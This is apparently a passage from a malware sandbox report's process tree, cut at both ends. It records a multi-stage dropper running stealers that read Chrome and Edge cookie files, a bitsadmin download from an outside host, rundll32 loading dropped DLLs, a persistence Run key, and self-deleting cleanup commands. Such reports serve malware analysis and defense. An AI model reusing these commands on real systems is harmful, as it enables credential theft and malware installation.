                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                      8⤵
                                                                                                        PID:2104
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:4820
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4628
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5536
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:5808
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:4476
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                              PID:2044
                                                                                                        • C:\Users\Admin\Documents\FiU9sSpd7Zp6iQIp6Jbu2XlB.exe
                                                                                                          "C:\Users\Admin\Documents\FiU9sSpd7Zp6iQIp6Jbu2XlB.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:2352
                                                                                                          • C:\Users\Admin\Documents\FiU9sSpd7Zp6iQIp6Jbu2XlB.exe
                                                                                                            "{path}"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4780
                                                                                                          • C:\Users\Admin\Documents\FiU9sSpd7Zp6iQIp6Jbu2XlB.exe
                                                                                                            "{path}"
                                                                                                            7⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks processor information in registry
                                                                                                            PID:5712
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im FiU9sSpd7Zp6iQIp6Jbu2XlB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\FiU9sSpd7Zp6iQIp6Jbu2XlB.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              8⤵
                                                                                                                PID:408
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im FiU9sSpd7Zp6iQIp6Jbu2XlB.exe /f
                                                                                                                  9⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:2100
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 6
                                                                                                                  9⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:184
                                                                                                          • C:\Users\Admin\Documents\W1ta6HGiRMgwP0N5MPmMDAuI.exe
                                                                                                            "C:\Users\Admin\Documents\W1ta6HGiRMgwP0N5MPmMDAuI.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4428
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 660
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4784
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 676
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4808
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 632
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4416
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 668
                                                                                                              7⤵
                                                                                                              • Program crash
                                                                                                              PID:4936
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 1080
                                                                                                              7⤵
                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                              • Program crash
                                                                                                              PID:752
                                                                                                          • C:\Users\Admin\Documents\4fJU_Fhb5vJNiB0odNTpmfl3.exe
                                                                                                            "C:\Users\Admin\Documents\4fJU_Fhb5vJNiB0odNTpmfl3.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4544
                                                                                                          • C:\Users\Admin\Documents\9XXAVU4L4cXfsMjH_MDFQZhz.exe
                                                                                                            "C:\Users\Admin\Documents\9XXAVU4L4cXfsMjH_MDFQZhz.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:4832
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:5092
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:184
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                    PID:4340
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                    7⤵
                                                                                                                      PID:4776
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                      7⤵
                                                                                                                        PID:5680
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                        7⤵
                                                                                                                          PID:5396
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                          7⤵
                                                                                                                          • Checks for any installed AV software in registry
                                                                                                                          PID:2716
                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                          "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                          7⤵
                                                                                                                          • Download via BitsAdmin
                                                                                                                          PID:4484
                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p0DbCqWG1ERD3JIS -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                          7⤵
                                                                                                                            PID:5488
                                                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ptLtnjQOMo5yzNdE -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                            7⤵
                                                                                                                              PID:4708
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:4360
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                7⤵
                                                                                                                                  PID:1132
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:3904
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      8⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:5488
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:988
                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:5264
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          8⤵
                                                                                                                                            PID:1132
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\zMuEjhunjM\zMuEjhunjM.dll" zMuEjhunjM
                                                                                                                                          7⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:4584
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\zMuEjhunjM\zMuEjhunjM.dll" zMuEjhunjM
                                                                                                                                            8⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            PID:2712
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                          7⤵
                                                                                                                                            PID:5080
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              8⤵
                                                                                                                                                PID:3904
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                                PID:4912
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                                7⤵
                                                                                                                                                  PID:5584
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:656
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvB96F.tmp\tempfile.ps1"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:3192
                                                                                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5040
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          8⤵
                                                                                                                                                            PID:5080
                                                                                                                                                      • C:\Users\Admin\Documents\785CvRy4q5HjVbXJJunOrRoE.exe
                                                                                                                                                        "C:\Users\Admin\Documents\785CvRy4q5HjVbXJJunOrRoE.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3904
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 660
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5104
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 672
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4252
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 780
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4780
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 816
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:1444
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 1124
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5008
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 1152
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5456
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 1164
                                                                                                                                                          7⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5592
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "785CvRy4q5HjVbXJJunOrRoE.exe" /f & erase "C:\Users\Admin\Documents\785CvRy4q5HjVbXJJunOrRoE.exe" & exit
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5868
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /im "785CvRy4q5HjVbXJJunOrRoE.exe" /f
                                                                                                                                                              8⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:6096
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2004
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_3.exe
                                                                                                                                                        sonia_3.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:1612
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 928
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          • Program crash
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4696
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 536
                                                                                                                                                      4⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2564
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:3864
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:932
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  PID:4128
                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4592
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.exe" -a
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3092
                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:1772
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:1564
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-J6G5N.tmp\4fJU_Fhb5vJNiB0odNTpmfl3.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-J6G5N.tmp\4fJU_Fhb5vJNiB0odNTpmfl3.tmp" /SL5="$20208,138429,56832,C:\Users\Admin\Documents\4fJU_Fhb5vJNiB0odNTpmfl3.exe"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:3892
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-9B9JP.tmp\Setup.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-9B9JP.tmp\Setup.exe" /Verysilent
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    PID:5884
                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5484
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        4⤵
                                                                                                                                                          PID:4760
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1812
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5032
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5616
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:4960
                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:2764
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5808
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3868
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 24
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:1820
                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5148
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3689717.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3689717.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:628
                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 628 -s 1920
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5960
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6228394.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6228394.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  PID:3380
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4588
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8653709.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8653709.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5728
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2381381.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2381381.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5696
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:4452
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:5416
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im GameBox64bit.exe /f
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:3644
                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                            timeout /t 6
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                            PID:4856
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4476
                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:6108
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe" /Silent
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5576
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:6048
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /f /im chrome.exe
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:3956
                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 4592 -s 492
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:4148
                                                                                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      PID:3752
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:5056
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
